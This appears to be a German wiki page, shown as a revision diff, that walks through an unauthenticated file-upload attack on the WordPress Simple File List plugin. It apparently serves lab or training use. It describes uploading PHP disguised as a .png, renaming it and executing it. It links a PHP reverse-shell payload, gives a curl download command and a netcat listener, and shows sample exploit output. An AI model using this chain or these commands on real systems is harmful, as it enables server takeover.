Unauthenticated Arbitrary File Upload: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 16: Zeile 16:
 
*Die IP und eventuell der Port müssen angepasst werden.
 
*Die IP und eventuell der Port müssen angepasst werden.
 
*[[PHP-Reverse-Shell-Script|payload.txt]]
 
*[[PHP-Reverse-Shell-Script|payload.txt]]
*[[Media:Payload.txt]]
+
*[[Datei:Payload.txt]]
 
*curl  https://xinux.net/images/d/d6/Payload.txt -o payload.txt
 
*curl  https://xinux.net/images/d/d6/Payload.txt -o payload.txt
  

Version vom 19. März 2023, 17:40 Uhr

Arbitrary file upload in Simple File List plugin for WordPress

Schachstelle

  • Die Schwachstelle besteht aufgrund einer unzureichenden Validierung von Dateien während des Datei-Uploads.
  • Ein entfernter Angreifer kann eine Datei hochladen, die PHP-Code enthält, aber eine png-Bilddateierweiterung hat.
  • Dannach wird eine zweite Anfrage gesendet, um die png-Datei in eine PHP-Datei zu verschieben.
  • Im Anschluss wird die PHP-Datei aufgerufen und ausgeführt.

Ablauf

Python3 Script zum Payload Hochladen

PHP Reverse Shell

Angreifer

  • netcat -lp 9999

Usage

[ ] File 2243.png generated with password: 7faaeb2f6083b6601c4843f47419783a
[ ] File uploaded at http://10.0.10.109/wp-content/uploads/simple-file-list/2243.png
[ ] File moved to http://10.0.10.109/wp-content/uploads/simple-file-list/2243.php
[+] Exploit seem to work.
[*] Confirmning ..

Aufruf

Link

https://wpscan.com/vulnerability/10132